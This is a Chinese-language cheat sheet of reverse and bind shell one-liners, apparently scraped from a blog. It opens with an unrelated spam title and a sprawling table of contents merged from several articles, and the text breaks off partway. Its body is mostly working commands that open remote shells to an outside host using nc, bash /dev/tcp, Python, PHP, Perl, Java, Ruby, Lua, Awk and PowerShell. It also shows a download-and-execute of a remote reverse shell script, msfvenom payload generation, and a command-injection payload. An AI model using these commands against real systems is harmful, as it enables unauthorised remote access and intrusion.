做網(wǎng)站的職位家庭優(yōu)化大師下載
反彈shell總結(jié)
- 講在前面說的話:
- 反彈shell總結(jié)
- nc反彈shell
- 正向shell
- 反向shell
- 正向shell(服務(wù)端被攻擊):
- 反向shell(客戶端被攻擊):
- 無nc反彈shell
- python反彈shell
- bash反彈shell
- PHP反向shell
- Perl反向shell
- Java反彈shell
- socat 反彈shell
- Ruby反彈shell
- Lua反彈shell
- Awk 反彈shell
- exec反彈shell
- powershell反彈shell
- 利用msf生成反彈shell
- kali綜合滲透測試-常用代碼
- 各種反彈shell方法總結(jié)備忘
- shell分為兩種,一種是正向shell,另一種是反向shell。
- (1)正向shell
- (2)反向shell
- 4.在目標(biāo)主機(jī)中沒有nc時獲得反向shell
- (1)Python反向shell
- (2)Bash反向shell
- (3)PHP反向shell
- (4)Perl反向shell
- (5)Java腳本反彈shell
- (6)socat 反彈shell
- (7)Ruby反彈shell
- (8)Lua反彈shell
- (9)Awk反彈shell
- (10)exec反彈shell
- (11)nc反彈shell:
- (12)powershell反彈shell
- (13)從原生的 shell 環(huán)境切換到linux的交互式 bash 環(huán)境 通常我們nc獲得的shell都是不完全shell,需要通過Python的pty轉(zhuǎn)換為擁有完全命令行的完全shell,方便我們進(jìn)行復(fù)制粘貼等操作。
- 【技術(shù)分享】linux各種一句話反彈shell總結(jié)
- 簡介
- 一、場景一
- 1.1 安裝netcat
- 1.2 開啟本地監(jiān)聽
- 1.3 直接連接目標(biāo)主機(jī)
- 二、場景二
- 2.1 bash 直接反彈
- 2.2 netcat 工具反彈
- 2.3 socat 反彈一句話
- 2.4 其他腳本一句話shell反彈
- 2.5 msfvenom 獲取反彈一句話
- 三、場景三
- 3.1 一句話添加賬號
- 3.2 python 標(biāo)準(zhǔn)虛擬終端獲取
- 四、寫在最后
- 4.1 nc開啟本地監(jiān)聽發(fā)布bash服務(wù)
- 4.2 常用反彈shell一句話
- 4.3 利用msfvenom獲取反彈一句話
- 4.4 使用python獲取標(biāo)準(zhǔn)shell
- 4.5 linux 一句話添加賬戶
- 學(xué)習(xí)參考
- 反彈SHELL匯總
- Reverse Shell Cheat Sheet
- Bash
- PERL
- Python
- PHP
- Ruby
- Netcat
- Java
- xterm
- Further Reading
- 幾種常見反彈shell匯總
- 0x01. bash
- 0x02. nc(netcat)反彈
- 0x03. telnet反彈
- 常見腳本反彈
- 1. python
- 2. perl
- 方法二:
- 3. Ruby
- 4. PHP
- 5. Java
- 6. Lua
- 7. AWK 反彈
- Reference
- 10種反彈shell方式
- 參考鏈接:
- 10種反彈shell方式
- 1. bash
- 2. perl
- 3. python
- 4. php
- 5. ruby
- 6. nc
- 7. java
- 8. xterm
- 9. exec
- 10. 從原生的 shell 環(huán)境切換到 linux 的交互式 bash 環(huán)境
講在前面說的話:
沒有任何基礎(chǔ)的 推薦 【技術(shù)分享】linux各種一句話反彈shell總結(jié)
反彈shell總結(jié)
nc反彈shell
正向shell
nc -lvp 1234 -e /bin/bash # linux 服務(wù)端(被攻擊的主機(jī))
nc -lvp 1234 -e c:\windows\system32\cmd.exe # windows 服務(wù)端(被攻擊的主機(jī))
nc host.example.com 1234 # linux 客戶端
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l host.example.com 1234 > /tmp/f # linux 服務(wù)端(被攻擊的主機(jī))
nc host.example.com 1234 # 客戶端
反向shell
nc -lvp 1234 # 服務(wù)端
nc host.example.com 1234 -e /bin/sh # linux 客戶端 (被攻擊的主機(jī))
nc host.example.com 1234 -e c:\windows\system32\cmd.exe # windows 客戶端 (被攻擊的主機(jī))
正向shell(服務(wù)端被攻擊):
本地或vps將自己的shell傳給服務(wù)器(端口監(jiān)聽在服務(wù)器上)
反向shell(客戶端被攻擊):
目標(biāo)機(jī)器將shell主動傳給本地或vps(端口監(jiān)聽在本地vps上)
無nc反彈shell
python反彈shell
nc -lvp 1234 # 服務(wù)端
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("host.example.com",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# 繞過限制sudo提權(quán)
sudo python -c "import pty;pty.spawn("/bin/bash")"
# 反彈shell后,顯示當(dāng)前用戶信息
python -c "import pty; pty.spawn("/bin/bash")"
bash反彈shell
nc -lvp 1234 # 服務(wù)端
bash -i >& /dev/tcp/host.example.com/1234 0>&1 # 客戶端 (被攻擊的主機(jī))
PHP反向shell
php -r '$sock=fsockopen("host.example.com",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Perl反向shell
perl -e 'use Socket;$i="host.example.com";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"host.example.com:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Java反彈shell
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/host.example.com/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"});
p.waitFor();
Runtime r = Runtime.getRuntime();
Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/host.example.com/1234 0>&1"});
p.waitFor();
socat 反彈shell
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat chmod 755 /tmp/socat /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:host.example.com:1234
Ruby反彈shell
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("host.example.com","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'c=TCPSocket.new("host.example.com","1234");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Lua反彈shell
lua -e "require('socket');require('os');t=socket.tcp();t:connect('host.example.com','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Awk 反彈shell
awk 'BEGIN{s="/inet/tcp/0/host.example.com/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
exec反彈shell
exec 5<>/dev/tcp/host.example.com/1234 cat <&5 | while read line; do $line 2>&5 >&5; done
0<&196;exec 196<>/dev/tcp/host.example.com/1234; sh <&196>&196 2>&196
powershell反彈shell
apt-get install powshell
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress host.example.com -port 1234
利用msf生成反彈shell
Msfvenom生成一個反彈shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.212.6 LPORT=443 > shell443.php
利用模塊
use exploit/multi/handler
msf生成一個war格式的反彈shell
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.5 lport=6666 -f war -o test.war
msfvenom生成一個payload,上傳到目標(biāo),增加執(zhí)行權(quán)限
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.212.6 LPORT=8888 -f elf > shell.elf
kali綜合滲透測試-常用代碼
命令執(zhí)行漏洞反彈shell代碼:
echo “bash -i >& /dev/tcp/192.168.56.102/6666 0>&1” | bash
burpsuite抓包修改用戶名密碼的數(shù)據(jù)包內(nèi)容代入數(shù)據(jù)庫執(zhí)行,反彈shell語句
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1